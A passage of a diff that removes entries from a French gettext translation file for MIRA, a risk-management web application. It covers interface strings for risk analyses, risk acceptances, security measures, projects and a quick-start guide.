core/views.py:1756 -msgid "Risk acceptances" -msgstr "Acceptations de risque" - -#: core/templates/base.html:94 core/templates/core/base.html:92 -msgid "" -"The maximum number of licensed users has been exceeded. Please reduce the " -"number of users or acquire an appropriate license." -msgstr "" -"Le nombre maximum d'utilisateurs sur cette licence a été dépassé. Veuillez " -"réduire le nombre d'utilisateurs ou acquérir une licence appropriée." - -#: core/templates/base.html:104 core/templates/core/base.html:102 -#: core/templates/core/sidebar.html:384 -msgid "About MIRA" -msgstr "À propos de MIRA" - -#: core/templates/core/acceptance_list.html:57 -#: core/templates/core/analysis_list.html:57 -#: core/templates/core/mtg_list.html:56 -#: core/templates/core/project_list.html:56 core/templates/core/ri_list.html:57 -#: core/templates/core/security_function_list.html:55 -#: core/templates/core/threat_list.html:56 -#: core/templates/core/user_list.html:55 -msgid "Filters" -msgstr "Filtres" - -#: core/templates/core/acceptance_list.html:80 -#: core/templates/core/analysis_list.html:80 -#: core/templates/core/mtg_list.html:79 -#: core/templates/core/project_list.html:79 core/templates/core/ri_list.html:80 -#: core/templates/core/security_function_list.html:78 -#: core/templates/core/threat_list.html:79 -#: core/templates/core/user_list.html:78 -msgid "Apply" -msgstr "Appliquer" - -#: core/templates/core/acceptance_list.html:97 -#: core/templates/core/analysis_list.html:97 -#: core/templates/core/asset_list.html:32 -#: core/templates/core/group_list.html:30 core/templates/core/mtg_list.html:96 -#: core/templates/core/project_domain_list.html:31 -#: core/templates/core/project_list.html:96 core/templates/core/ri_list.html:97 -#: core/templates/core/risk_matrix_list.html:32 -#: core/templates/core/security_function_list.html:95 -#: core/templates/core/threat_list.html:97 -#: core/templates/core/user_list.html:95 -msgid "Clear Filters" -msgstr "Effacer les filtres" - -#: core/templates/core/acceptance_list.html:103 -msgid "Add Risk Acceptance" -msgstr "Ajouter une acceptation de risque" - -#: core/templates/core/acceptance_list.html:103 -msgid "New risk acceptance" -msgstr "Nouvelle acceptation de risque" - -#: core/templates/core/acceptance_list.html:113 -msgid "Expiry Date" -msgstr "Date d'expiration" - -#: core/templates/core/acceptance_list.html:114 -#: core/templates/core/analysis_list.html:120 -#: core/templates/core/asset_list.html:50 -#: core/templates/core/group_list.html:45 core/templates/core/mtg_list.html:116 -#: core/templates/core/my_profile_detailed.html:34 -#: core/templates/core/project_domain_list.html:45 -#: core/templates/core/project_list.html:113 -#: core/templates/core/ri_list.html:114 -#: core/templates/core/risk_matrix_list.html:54 -#: core/templates/core/role_list.html:45 core/templates/core/role_list.html:125 -#: core/templates/core/security_function_list.html:109 -#: core/templates/core/threat_list.html:111 -#: core/templates/core/treatment.html:35 core/templates/core/user_list.html:118 -#: core/templates/library/library_list.html:22 -msgid "Actions" -msgstr "" - -#: core/templates/core/acceptance_list.html:136 -#: core/templates/core/fragments/watchlist_exceptions.html:27 -msgid "action requested" -msgstr "action requise" - -#: core/templates/core/acceptance_list.html:172 -msgid "Delete risk acceptance?" -msgstr "Supprimer l'acceptation de risque ?" - -#: core/templates/core/acceptance_list.html:182 -msgid "No risk acceptance found." -msgstr "Aucune acceptation de risque trouvée." - -#: core/templates/core/analysis_list.html:7 core/templates/core/sidebar.html:97 -#: core/views.py:469 -msgid "Risk analyses" -msgstr "Analyses de risque" - -#: core/templates/core/analysis_list.html:104 -#: core/templates/core/detail/project_detail.html:9 -msgid "WARNING" -msgstr "ATTENTION" - -#: core/templates/core/analysis_list.html:104 -#: core/templates/core/analysis_list.html:106 -#: core/templates/core/detail/project_detail.html:9 -#: core/templates/core/detail/project_detail.html:11 -#: core/templates/core/project_update.html:54 -msgid "New risk analysis" -msgstr "Nouvelle analyse de risque" - -#: core/templates/core/analysis_list.html:106 -#: core/templates/core/detail/project_detail.html:11 -#: core/templates/core/project_update.html:54 -#: core/templates/core/quick_start.html:125 -#: core/templates/snippets/create_modal.html:28 -msgid "Add analysis" -msgstr "Ajouter une analyse" - -#: core/templates/core/analysis_list.html:115 core/templates/core/index.html:34 -#: core/templates/snippets/mtg_list_nested.html:7 -#: core/templates/snippets/ra_list_nested.html:7 -#: core/templates/snippets/ri_list_nested.html:7 -msgid "ID" -msgstr "Identifiant" - -#: core/templates/core/analysis_list.html:119 core/templates/core/index.html:40 -#: core/templates/snippets/ra_list_nested.html:19 -msgid "Last Update" -msgstr "Dernière Mise à Jour" - -#: core/templates/core/analysis_list.html:130 core/templates/core/index.html:57 -#: core/templates/snippets/ra_list_nested.html:30 -msgid "ready" -msgstr "prêt" - -#: core/templates/core/analysis_list.html:173 -msgid "Delete risk analysis?" -msgstr "Supprimer l'analyse de risque ?" - -#: core/templates/core/analysis_list.html:182 -#: core/templates/core/index.html:132 core/templates/core/review.html:73 -#: core/templates/snippets/ra_list_nested.html:64 -msgid "No analysis found." -msgstr "Aucune analyse trouvée." - -#: core/templates/core/asset_form.html:29 -#: core/templates/core/fallback_form.html:34 -#: core/templates/core/group_create.html:29 -#: core/templates/core/group_update.html:29 -#: core/templates/core/mtg_update.html:30 -#: core/templates/core/password_change.html:30 -#: core/templates/core/pd_update.html:29 -#: core/templates/core/project_create.html:43 -#: core/templates/core/project_update.html:43 -#: core/templates/core/ra_create.html:33 core/templates/core/ra_update.html:47 -#: core/templates/core/ri_create.html:102 -#: core/templates/core/ri_update.html:210 -#: core/templates/core/risk_acceptance_update.html:25 -#: core/templates/core/risk_matrix_update.html:48 -#: core/templates/core/role_assignment_create.html:29 -#: core/templates/core/role_assignment_update.html:29 -#: core/templates/core/role_update.html:29 -#: core/templates/core/security_function_update.html:29 -#: core/templates/core/threat_update.html:29 -#: core/templates/core/user_create.html:41 -#: core/templates/core/user_update.html:43 -#: core/templates/snippets/create_modal.html:99 -#: core/templates/snippets/modal/modal_create_form.html:33 -#: core/templates/snippets/modal/modal_update_form.html:32 -msgid "Cancel" -msgstr "Annuler" - -#: core/templates/core/asset_form.html:32 -#: core/templates/core/fallback_form.html:36 -#: core/templates/core/group_create.html:31 -#: core/templates/core/group_update.html:31 -#: core/templates/core/mtg_update.html:33 -#: core/templates/core/password_change.html:32 -#: core/templates/core/pd_update.html:32 -#: core/templates/core/project_create.html:44 -#: core/templates/core/project_update.html:46 -#: core/templates/core/ra_create.html:35 core/templates/core/ra_update.html:51 -#: core/templates/core/ri_create.html:104 -#: core/templates/core/ri_update.html:214 -#: core/templates/core/risk_acceptance_update.html:28 -#: core/templates/core/risk_matrix_update.html:51 -#: core/templates/core/role_assignment_create.html:31 -#: core/templates/core/role_assignment_update.html:31 -#: core/templates/core/role_update.html:31 -#: core/templates/core/security_function_update.html:32 -#: core/templates/core/threat_update.html:32 -#: core/templates/core/user_update.html:46 -#: core/templates/snippets/create_modal.html:103 -#: core/templates/snippets/modal/modal_create_form.html:37 -#: core/templates/snippets/modal/modal_update_form.html:36 -msgid "Save" -msgstr "Enregistrer" - -#: core/templates/core/asset_list.html:38 -#: core/templates/core/quick_start.html:86 -msgid "Add asset" -msgstr "Ajouter un bien sensible" - -#: core/templates/core/asset_list.html:38 -msgid "New asset" -msgstr "Nouveau bien sensible" - -#: core/templates/core/asset_list.html:48 -msgid "Business value" -msgstr "Valeur métier" - -#: core/templates/core/asset_list.html:92 -msgid "Delete asset?" -msgstr "Supprimer le bien sensible ?" - -#: core/templates/core/asset_list.html:101 -msgid "No asset found." -msgstr "Aucun bien sensible trouvé." - -#: core/templates/core/browser.html:15 -#, python-format -msgid " Browsing %(type)s " -msgstr "Vous parcourez les %(type)s " - -#: core/templates/core/browser.html:15 -#, python-format -msgid " with filter: %(filter)s" -msgstr " avec le filtre : %(filter)s" - -#: core/templates/core/browser.html:26 core/templates/core/browser.html:51 -msgid "Locate" -msgstr "Voir" - -#: core/templates/core/browser.html:49 core/templates/core/ra_update.html:63 -#: core/templates/snippets/mp_data.html:11 -msgid "Associated risk scenarios" -msgstr "Scénarios de risque associés" - -#: core/templates/core/calendar.html:6 core/templates/core/sidebar.html:82 -msgid "Calendar" -msgstr "Calendrier" - -#: core/templates/core/calendar.html:11 -msgid "Previous month" -msgstr "Mois précédent" - -#: core/templates/core/calendar.html:12 -msgid "Next month" -msgstr "Mois suivant" - -#: core/templates/core/composer.html:10 -msgid "Your selection" -msgstr "Votre sélection" - -#: core/templates/core/composer.html:11 -msgid "Hint: you can bookmark this page for future usage" -msgstr "" -"Indice : vous pouvez ajouter cette page à vos favoris pour une utilisation " -"future" - -#: core/templates/core/composer.html:14 -#, python-format -msgid "" -"\n" -" Here is the overview for the selected analysis:\n" -" " -msgid_plural "" -"\n" -" Here is the overview for the %(counter)s selected analyses:\n" -" " -msgstr[0] "" -"\n" -" Voici l'aperçu de l'analyse sélectionnée :\n" -" " -msgstr[1] "" -"\n" -" Voici l'aperçu des %(counter)s analyses sélectionnées :\n" -" " - -#: core/templates/core/composer.html:23 core/templates/core/composer.html:26 -#: core/templates/core/overview.html:67 -msgid "Current risk level per risk scenario" -msgstr "Niveau de risque courant par scénario de risque" - -#: core/templates/core/composer.html:32 -msgid "Status of associated measures" -msgstr "Statut des mesures associées" - -#: core/templates/core/composer.html:40 core/templates/core/composer.html:42 -#: core/templates/core/overview.html:73 -msgid "Residual risk level per risk scenario" -msgstr "Niveau de risque résiduel par scénario de risque" - -#: core/templates/core/composer.html:50 -msgid "For the selected scope, you have:" -msgstr "Pour la portée sélectionnée, vous avez :" - -#: core/templates/core/composer.html:54 -#, python-format -msgid "" -"\n" -" %(counter)s untreated risk scenario\n" -" " -msgid_plural "" -"\n" -" %(counter)s untreated risk scenarios\n" -" " -msgstr[0] "" -"\n" -" %(counter)s scénario de risque non traité\n" -" " -msgstr[1] "" -"\n" -" %(counter)s scénarios de risque non traités\n" -" " - -#: core/templates/core/composer.html:65 core/templates/core/quick_start.html:38 -msgid "and" -msgstr "et" - -#: core/templates/core/composer.html:66 -#, python-format -msgid "" -"\n" -" %(counter)s risk scenario accepted\n" -" " -msgid_plural "" -"\n" -" %(counter)s risk scenarios accepted\n" -" " -msgstr[0] "" -"\n" -" %(counter)s scénario de risque accepté\n" -" " -msgstr[1] "" -"\n" -" %(counter)s scénarios de risque acceptés\n" -" " - -#: core/templates/core/composer.html:94 -msgid "Review needed" -msgstr "Révision requise" - -#: core/templates/core/composer.html:95 -msgid "Ok" -msgstr "" - -#: core/templates/core/composer.html:101 -msgid "Found" -msgstr "Nous avons trouvé" - -#: core/templates/core/composer.html:102 -#, python-format -msgid "" -"\n" -" %(counter)s inconsistency that " -"you need to check (use x-rays for more information).\n" -" " -msgid_plural "" -"\n" -" %(counter)s inconsistencies that " -"you need to check (use x-rays for more information).\n" -" " -msgstr[0] "" -"\n" -" %(counter)s incohérence que vous " -"devez vérifier (utilisez x-rays pour plus d'information).\n" -" " -msgstr[1] "" -"\n" -" %(counter)s incohérences que vous " -"devez vérifier (utilisez x-rays pour plus d'information).\n" -" " - -#: core/templates/core/composer.html:113 -#: core/templates/snippets/ra_data.html:47 -msgid "Current" -msgstr "Risque courant" - -#: core/templates/core/composer.html:114 -#: core/templates/snippets/ra_data.html:55 -msgid "Residual" -msgstr "Risque résiduel" - -#: core/templates/core/composer.html:129 -msgid "Jump to full risk analysis" -msgstr "Aller à l'analyse de risque complète" - -#: core/templates/core/detail/folder_detail.html:7 -#: core/templates/core/pd_update.html:38 -msgid "Associated Projects" -msgstr "Projets associés" - -#: core/templates/core/detail/folder_detail.html:8 -#: core/templates/core/pd_update.html:39 -#: core/templates/core/project_list.html:102 -#: core/templates/core/quick_start.html:109 -msgid "Add project" -msgstr "Ajouter un projet" - -#: core/templates/core/detail/folder_detail.html:8 -#: core/templates/core/pd_update.html:39 -#: core/templates/core/project_create.html:4 -#: core/templates/core/project_list.html:102 -msgid "New project" -msgstr "Nouveau projet" - -#: core/templates/core/detail/project_detail.html:7 -#: core/templates/core/project_update.html:53 -msgid "Associated risk analyses" -msgstr "Analyses de risque associées" - -#: core/templates/core/detail/riskacceptance_detail.html:8 -msgid "" -"This risk acceptance is awaiting processing. Remember to review it before accepting or rejecting it, you will not be able to go back." -msgstr "" -"Cette acceptation de risque est en attente de traitement. N'oubliez pas de " -"la relire avant de l'accepter ou de la rejeter, vous ne " -"pourrez plus revenir en arrière par la suite." - -#: core/templates/core/detail/riskacceptance_detail.html:11 -msgid "Accept risk acceptance" -msgstr "Accepter l'acceptation de risque" - -#: core/templates/core/detail/riskacceptance_detail.html:11 -msgid "Accept" -msgstr "Accepter" - -#: core/templates/core/detail/riskacceptance_detail.html:12 -msgid "Reject risk acceptance" -msgstr "Rejeter l'acceptation de risque" - -#: core/templates/core/detail/riskacceptance_detail.html:12 -msgid "Reject" -msgstr "Rejeter" - -#: core/templates/core/detail/riskacceptance_detail.html:21 -#: core/templates/core/my_profile_detailed.html:25 -#: core/templates/core/risk_matrix_detailed.html:24 -#: core/templates/generic/detail.html:34 -#: core/templates/snippets/ra_data.html:10 -msgid "Edit" -msgstr "Modifier" - -#: core/templates/core/detail/riskacceptance_detail.html:30 -msgid "" -"This risk acceptance is currently accepted. You can revoke it at any time, " -"but this will be irrevocable. You will need to duplicate it " -"with a different verison if necessary." -msgstr "" -"Cette acceptation de risque est actuellement acceptée. Vous pouvez la " -"révoquer à tout moment, mais cette action sera irrévocable. " -"Vous devrez la dupliquer avec une version différente si nécessaire." - -#: core/templates/core/detail/riskacceptance_detail.html:33 -msgid "Revoke risk acceptance" -msgstr "Révoquer l'acceptation de risque" - -#: core/templates/core/detail/riskacceptance_detail.html:33 -msgid "Revoke" -msgstr "Révoquer" - -#: core/templates/core/fragments/animated_donut_chart.html:7 -#: core/templates/core/fragments/risks_over_time.html:6 -msgid " \"Very low\" " -msgstr " \"Très faible\" " - -#: core/templates/core/fragments/animated_donut_chart.html:8 -#: core/templates/core/fragments/risks_over_time.html:7 -msgid " \"Low\" " -msgstr " \"Faible\" " - -#: core/templates/core/fragments/animated_donut_chart.html:9 -#: core/templates/core/fragments/risks_over_time.html:8 -msgid " \"Medium\" " -msgstr " \"Moyen\" " - -#: core/templates/core/fragments/animated_donut_chart.html:10 -#: core/templates/core/fragments/risks_over_time.html:9 -msgid " \"High\" " -msgstr " \"Élevé\" " - -#: core/templates/core/fragments/animated_donut_chart.html:11 -#: core/templates/core/fragments/risks_over_time.html:10 -msgid " \"Very high\" " -msgstr " \"Très élevé\" " - -#: core/templates/core/fragments/risks_over_time.html:11 -msgid " \"Jan\" " -msgstr "" - -#: core/templates/core/fragments/risks_over_time.html:12 -msgid " \"Feb\" " -msgstr " \"Fév\" " - -#: core/templates/core/fragments/risks_over_time.html:13 -msgid " \"Mar\" " -msgstr "" - -#: core/templates/core/fragments/risks_over_time.html:14 -msgid " \"Apr\" " -msgstr " \"Avr\" " - -#: core/templates/core/fragments/risks_over_time.html:15 -msgid " \"May\" " -msgstr " \"Mai\" " - -#: core/templates/core/fragments/risks_over_time.html:16 -msgid " \"Jun\" " -msgstr " \"Juin\" " - -#: core/templates/core/fragments/risks_over_time.html:17 -msgid " \"Jul\" " -msgstr " \"Juil\" " - -#: core/templates/core/fragments/risks_over_time.html:18 -msgid " \"Aug\" " -msgstr " \"Août\" " - -#: core/templates/core/fragments/risks_over_time.html:19 -msgid " \"Sep\" " -msgstr "" - -#: core/templates/core/fragments/risks_over_time.html:20 -msgid " \"Oct\" " -msgstr "" - -#: core/templates/core/fragments/risks_over_time.html:21 -msgid " \"Nov\" " -msgstr "" - -#: core/templates/core/fragments/risks_over_time.html:22 -msgid " \"Dec\" " -msgstr " \"Déc\" " - -#: core/templates/core/fragments/watchlist_exceptions.html:8 -msgid "Acceptance" -msgstr "Acceptation" - -#: core/templates/core/fragments/watchlist_exceptions.html:40 -#: core/templates/core/fragments/watchlist_measures.html:35 -msgid "expired" -msgstr "expiré" - -#: core/templates/core/fragments/watchlist_exceptions.html:49 -msgid "No exceptions yet." -msgstr "Aucune exception pour le moment." - -#: core/templates/core/fragments/watchlist_measures.html:8 -#: core/templates/core/mtg_list.html:109 core/templates/core/treatment.html:31 -#: core/templates/snippets/mtg_list_nested.html:10 -msgid "Measure" -msgstr "Mesure" - -#: core/templates/core/fragments/watchlist_measures.html:44 -msgid "No measures yet." -msgstr "Aucune mesure pour le moment." - -#: core/templates/core/group_create.html:4 -msgid "New user group" -msgstr "Nouveau groupe utilisateur" - -#: core/templates/core/group_create.html:10 -#: core/templates/core/group_update.html:10 -msgid "Group information" -msgstr "informations sur le groupe" - -#: core/templates/core/group_list.html:6 core/templates/core/sidebar.html:217 -#: core/templates/core/sidebar.html:226 -msgid "Groups" -msgstr "Groupes" - -#: core/templates/core/group_list.html:44 -#: core/templates/core/my_profile_detailed.html:33 -msgid "Group Name" -msgstr "Nom du groupe" - -#: core/templates/core/group_list.html:54 -#: core/templates/core/my_profile_detailed.html:43 -msgid "built-in" -msgstr "intégré" - -#: core/templates/core/group_list.html:80 -#: core/templates/core/my_profile_detailed.html:69 -msgid "Delete user group?" -msgstr "Supprimer le groupe utilisateur ?" - -#: core/templates/core/group_list.html:90 -#: core/templates/core/my_profile_detailed.html:79 -msgid "No user group found." -msgstr "Aucun groupe utilisateur trouvé." - -#: core/templates/core/group_update.html:4 -#: core/templates/core/role_update.html:4 -msgid "Edit user group" -msgstr "Modifier le groupe utilisateur" - -#: core/templates/core/group_update.html:39 -msgid "Associated users" -msgstr "Utilisateurs associés" - -#: core/templates/core/group_update.html:45 -msgid "Other users" -msgstr "Autres utilisateurs" - -#: core/templates/core/index.html:6 core/templates/core/sidebar.html:46 -#: core/views.py:416 -msgid "Analysis registry" -msgstr "Registre d'analyse" - -#: core/templates/core/index.html:18 core/templates/core/search_results.html:20 -msgid "Search risk scenario, security measure, risk analysis..." -msgstr "" -"Rechercher un scénario de risque, une mesure de sécurité, une analyse de " -"risque..." - -# debatable, I took the same as jira for consistency -#: core/templates/core/index.html:37 -msgid "Assignee" -msgstr "Responsable" - -#: core/templates/core/index.html:87 core/templates/core/mp.html:11 -msgid "Remediation plan" -msgstr "Plan de remédiation" - -#: core/templates/core/index.html:97 -msgid "Export" -msgstr "Exporter" - -#: core/templates/core/index.html:108 core/templates/core/quick_start.html:115 -#: core/templates/core/ra_update.html:16 -#: core/templates/snippets/ra_data.html:13 -msgid "Risk analysis" -msgstr "Analyse de risque" - -#: core/templates/core/index.html:110 core/templates/core/index.html:115 -msgid "... as PDF" -msgstr "... format PDF" - -#: core/templates/core/index.html:112 core/templates/core/index.html:117 -msgid "... as csv" -msgstr "... format CSV" - -#: core/templates/core/index.html:113 -msgid "Treatment plan" -msgstr "Plan de traitement" - -#: core/templates/core/index.html:142 core/templates/snippets/paginator.html:5 -msgid "Showing Page" -msgstr "Page" - -#: core/templates/core/index.html:142 core/templates/snippets/paginator.html:5 -msgid "of" -msgstr "sur" - -#: core/templates/core/index.html:149 core/templates/snippets/paginator.html:13 -msgid "First" -msgstr "Prem." - -#: core/templates/core/index.html:152 core/templates/snippets/paginator.html:16 -msgid "Prev" -msgstr "Préc." - -#: core/templates/core/index.html:157 core/templates/snippets/paginator.html:21 -msgid "Next" -msgstr "Suiv." - -#: core/templates/core/index.html:159 core/templates/snippets/paginator.html:24 -msgid "Last" -msgstr "Fin" - -#: core/templates/core/mtg_list.html:102 -#: core/templates/core/quick_start.html:150 -#: core/templates/core/ri_update.html:199 -msgid "Add security measure" -msgstr "Ajouter une mesure de sécurité" - -#: core/templates/core/mtg_list.html:102 -#: core/templates/snippets/modal/modal_update_form.html:7 -msgid "New security measure" -msgstr "Nouvelle mesure de sécurité" - -#: core/templates/core/mtg_list.html:192 -msgid "Delete security measure?" -msgstr "Supprimer la mesure de sécurité ?" - -#: core/templates/core/mtg_list.html:201 -#: core/templates/snippets/mtg_list_nested.html:52 -msgid "No measure found." -msgstr "Aucune mesure trouvée." - -#: core/templates/core/mtg_update.html:11 -msgid "Measure summary" -msgstr "Résumé de la mesure" - -#: core/templates/core/my_profile_detailed.html:5 -#: core/templates/core/sidebar.html:354 -msgid "My profile" -msgstr "Mon profil" - -#: core/templates/core/my_profile_detailed.html:26 -msgid "Passkeys" -msgstr "" - -#: core/templates/core/my_profile_detailed.html:29 -#: core/templates/core/role_list.html:36 core/views.py:1997 core/views.py:2096 -msgid "User groups" -msgstr "Groupes utilisateurs" - -#: core/templates/core/overview.html:10 core/templates/core/overview.html:19 -#: core/templates/core/sidebar.html:73 -#: core/templates/library/library_list.html:21 -msgid "Overview" -msgstr "Vue d'ensemble" - -#: core/templates/core/overview.html:25 -msgid "Treatment" -msgstr "Traitement" - -#: core/templates/core/overview.html:31 -#: core/templates/core/project_select.html:12 -msgid "Composer" -msgstr "Composition" - -#: core/templates/core/overview.html:38 -msgid "Statistics" -msgstr "Statistiques" - -#: core/templates/core/overview.html:47 -msgid "Scenarios" -msgstr "Scénarios" - -#: core/templates/core/overview.html:62 -msgid "My projects" -msgstr "Mes projets" - -#: core/templates/core/overview.html:63 -msgid "Assigned to" -msgstr "Assigné à" - -#: core/templates/core/overview.html:63 -msgid "projects" -msgstr "projets" - -#: core/templates/core/overview.html:74 core/templates/core/ri_update.html:193 -msgid "Residual risk" -msgstr "Risque résiduel" - -#: core/templates/core/overview.html:78 -msgid "Security measures status" -msgstr "Statut des mesures de sécurité" - -#: core/templates/core/overview.html:86 -msgid "Watch list" -msgstr "Liste de surveillance" - -#: core/templates/core/overview.html:87 -msgid "Items that have expired or with close ETA" -msgstr "Éléments qui ont expiré ou avec ETA proche" - -#: core/templates/core/overview.html:91 -msgid "Measures to review" -msgstr "Mesures à revoir" - -#: core/templates/core/overview.html:95 -msgid "Exceptions to review" -msgstr "Exceptions à revoir" - -#: core/templates/core/password_change.html:4 -msgid "Change password" -msgstr "Changer le mot de passe" - -#: core/templates/core/password_change.html:11 -msgid "Enter a new password for the user " -msgstr "Entrez un nouveau mot de passe pour l'utilisateur " - -#: core/templates/core/project_create.html:14 -#: core/templates/core/project_list.html:108 -#: core/templates/core/project_update.html:15 -msgid "Project Name" -msgstr "Nom du projet" - -#: core/templates/core/project_create.html:19 -msgid "Internal ID" -msgstr "ID interne" - -#: core/templates/core/project_domain_list.html:5 -#: core/templates/core/quick_start.html:49 core/templates/core/sidebar.html:138 -#: core/views.py:258 core/views.py:801 core/views.py:1142 -msgid "Projects domains" -msgstr "Domaines de projets" - -#: core/templates/core/project_domain_list.html:37 -#: core/templates/core/quick_start.html:59 -msgid "Add projects domain" -msgstr "Ajouter un domaine de projets" - -#: core/templates/core/project_domain_list.html:37 -msgid "New projects domain" -msgstr "Nouveau domaine de projets" - -#: core/templates/core/project_domain_list.html:75 -msgid "Delete projects domain?" -msgstr "Supprimer le domaine de projets ?" - -#: core/templates/core/project_domain_list.html:85 -msgid "No projects domain found." -msgstr "Aucun domaine de projets trouvé." - -#: core/templates/core/project_list.html:168 -msgid "Delete project?" -msgstr "Supprimer le projet ?" - -#: core/templates/core/project_list.html:178 -#: core/templates/snippets/project_list_nested.html:45 -msgid "No project found." -msgstr "Aucun projet trouvé." - -#: core/templates/core/project_select.html:19 -msgid "" -"This will help you aggregate multiple components (projects) to get the " -"compiled view on your risk. This is particularly useful for two use cases:" -msgstr "" -"Cet outil vous aidera à agréger des composants (projets) multiples afin " -"d'avoir une vue synthétique sur votre risque, ce qui est particulièrement " -"utile dans deux cas :" - -#: core/templates/core/project_select.html:21 -msgid "" -"business intelligence approach to focus on a specific subset across " -"different project domains (eg. across divisions)" -msgstr "" -"vous adoptez une approche Business Intelligence afin de vous concentrer sur " -"un sous-ensemble précis distribué sur différents domaines de projets (ex : " -"plusieurs divisions)" - -#: core/templates/core/project_select.html:22 -msgid "" -"you are interested in the risk assessment of a specific system, for which " -"you need the risk assessment of the underlying components" -msgstr "" -"vous voulez évaluer le risque d'un système spécifique, pour lequel vous avez " -"besoin de l'évaluation du risque des composants sous-jacents" - -#: core/templates/core/project_select.html:29 -msgid "Process" -msgstr "Traiter" - -#: core/templates/core/project_select.html:53 -msgid "Select your targets" -msgstr "Sélectionnez vos cibles" - -#: core/templates/core/quick_start.html:5 core/templates/core/sidebar.html:56 -msgid "Quick start" -msgstr "Démarrage rapide" - -#: core/templates/core/quick_start.html:12 -msgid "To get started, you need:" -msgstr "Pour débuter, vous avez besoin:" - -#: core/templates/core/quick_start.html:21 -msgid "As administrator, you are in charge to import at least one" -msgstr "" -"En tant qu'administrateur, vous avez la responsabilité d'importer au moins " -"une" - -#: core/templates/core/quick_start.html:22 -msgid "rating matrix" -msgstr "matrice d'évaluation" - -#: core/templates/core/quick_start.html:26 -msgid "Imports" -msgstr "Importations" - -#: core/templates/core/quick_start.html:31 -msgid "" -"You will need security functions and threats to perform a security analysis. " -"You can either define custom" -msgstr "" -"Vous aurez besoin de fonctions de sécurité et de menaces pour réaliser une " -"analyse de sécurité. Vous pouvez soit personnaliser les " - -#: core/templates/core/quick_start.html:34 -msgid "security functions" -msgstr "fonctions de sécurité" - -#: core/templates/core/quick_start.html:36 -#: core/templates/core/security_function_list.html:101 -msgid "Add security function" -msgstr "Ajouter une fonction de sécurité" - -#: core/templates/core/quick_start.html:41 -msgid "threats" -msgstr "menaces" - -#: core/templates/core/quick_start.html:43 -#: core/templates/core/threat_list.html:103 -msgid "Add threat" -msgstr "Ajouter une menace" - -#: core/templates/core/quick_start.html:45 -msgid "or import them from a" -msgstr "ou les importer depuis une" - -#: core/templates/core/quick_start.html:45 -msgid "library" -msgstr "bibliothèque" - -#: core/templates/core/quick_start.html:54 -msgid "It's time to define some" -msgstr "C'est le moement de définir des" - -#: core/templates/core/quick_start.html:57 -msgid "projects domains" -msgstr "domaines de projets" - -#: core/templates/core/quick_start.html:61 -msgid "to organize your projects" -msgstr "pour organiser vos projets" - -#: core/templates/core/quick_start.html:65 -msgid "Users and groups" -msgstr "Utilisateurs et groupes" - -#: core/templates/core/quick_start.html:70 -msgid "Now declare a few" -msgstr "Maintenant déclarez quelques" - -#: core/templates/core/quick_start.html:71 -msgid "users" -msgstr "utilisateurs" - -#: core/templates/core/quick_start.html:72 -msgid "" -"and assign them to groups corresponding to their roles (domain manager, " -"analyst, auditor, ...)" -msgstr "" -"et assignez les aux groupes correspondant à leurs rôles (responsable de " -"domaine, analyste, auditeur, ...)" - -#: core/templates/core/quick_start.html:81 -msgid "Finally, you can identify and create relevant" -msgstr "Enfin, vous pouvez identifier et créer des" - -#: core/templates/core/quick_start.html:84 -msgid "assets" -msgstr "biens sensibles" - -#: core/templates/core/quick_start.html:88 -msgid "for your organization" -msgstr "pertinents pour votre organisation" - -#: core/templates/core/quick_start.html:95 -msgid "Now, you can start your risk assessment:" -msgstr "Maintenant, vous pouvez commencer votre évaluation de risque:" - -#: core/templates/core/quick_start.html:104 -msgid "As domain manager, create a" -msgstr "En tant que responsable de domaine, créez un" - -#: core/templates/core/quick_start.html:111 -msgid "within an existing domain" -msgstr "à l'intérieur d'un domaine existant" - -#: core/templates/core/quick_start.html:120 -msgid "You can now start a new" -msgstr "Vous pouvez maintenant commencer une nouvelle" - -#: core/templates/core/quick_start.html:123 -msgid "risk analysis" -msgstr "analyse de risque" - -#: core/templates/core/quick_start.html:127 -msgid "Identify the" -msgstr "Identifiez les" - -#: core/templates/core/quick_start.html:132 -#: core/templates/core/ri_list.html:103 -msgid "Add risk scenario" -msgstr "Ajouter un scénario de risque" - -#: core/templates/core/quick_start.html:134 -msgid "" -"based on threats to assets, and assess the current risk level. You can use " -"the" -msgstr "" -"basés sur les menaces pesant sur les biens sensibles, et évaluez le niveau " -"de risque courant. Vous pouvez utiliser l'" - -#: core/templates/core/quick_start.html:135 -msgid "scoring assistant" -msgstr "assistant d'évaluation" - -#: core/templates/core/quick_start.html:136 -msgid "to help you if needed." -msgstr "pour vous aider si nécessaire" - -#: core/templates/core/quick_start.html:140 -msgid "Risk treatment" -msgstr "traitement de risque" - -#: core/templates/core/quick_start.html:145 -msgid "For each risk scenario, try to define and apply additional" -msgstr "Pour chaque scénario de risque, essayez de définir et d'appliqer des " - -#: core/templates/core/quick_start.html:148 core/views.py:557 -msgid "security measures" -msgstr "mesures de sécurité" - -#: core/templates/core/quick_start.html:152 -msgid "based on security functions, and assess the residual risk level." -msgstr "" -"supplémentaires basées sur les fonctions de sécurité, et évaluez le niveau " -"de risque résiduel." - -#: core/templates/core/quick_start.html:156 -msgid "Check consistency" -msgstr "Vérifiez la cohérence" - -#: core/templates/core/quick_start.html:161 core/templates/core/review.html:6 -msgid "X-Rays" -msgstr "" - -#: core/templates/core/quick_start.html:162 -msgid "" -"will help you improve the quality of your analysis by pinpointing various " -"inconsistencies." -msgstr "" -"vous aidera à améliorer la qualité de vos analyses en vous pointant diverses " -"incohérences." - -#: core/templates/core/quick_start.html:166 -msgid "Report" -msgstr "Rapport" - -#: core/templates/core/quick_start.html:171 -msgid "To display your analysis, select it from the" -msgstr "Pour présenter votre analyse, sélectionnez la depuis le" - -#: core/templates/core/quick_start.html:172 -msgid "analysis registry." -msgstr "registre d'analyse. " - -#: core/templates/core/quick_start.html:173 -msgid "You can also export the risk analysis or its treatment plan as PDF/CSV." -msgstr "" -"Vous pouvez également exporter l'analyse de risque ou son plan de traitement " -"sous format PDF/CSV." - -#: core/templates/core/quick_start.html:180 -msgid "Further steps" -msgstr "Étapes suivantes" - -#: core/templates/core/quick_start.html:187 -msgid "Explore the dashboard to have an" -msgstr "Explorez le tableau de bord pour avoir une" - -#: core/templates/core/quick_start.html:188 -msgid "overview" -msgstr "vue d'ensemble" - -#: core/templates/core/quick_start.html:189 -msgid "of your analyses and check for coming deadlines with the" -msgstr "de vos analyses et vérifiez les échéances à venir à l'aide du " - -#: core/templates/core/quick_start.html:190 -msgid "calendar" -msgstr "calendrier" - -#: core/templates/core/quick_start.html:191 -msgid "You can also manage" -msgstr "Vous pouvez aussi gérer les" - -#: core/templates/core/quick_start.html:192 -msgid "risk 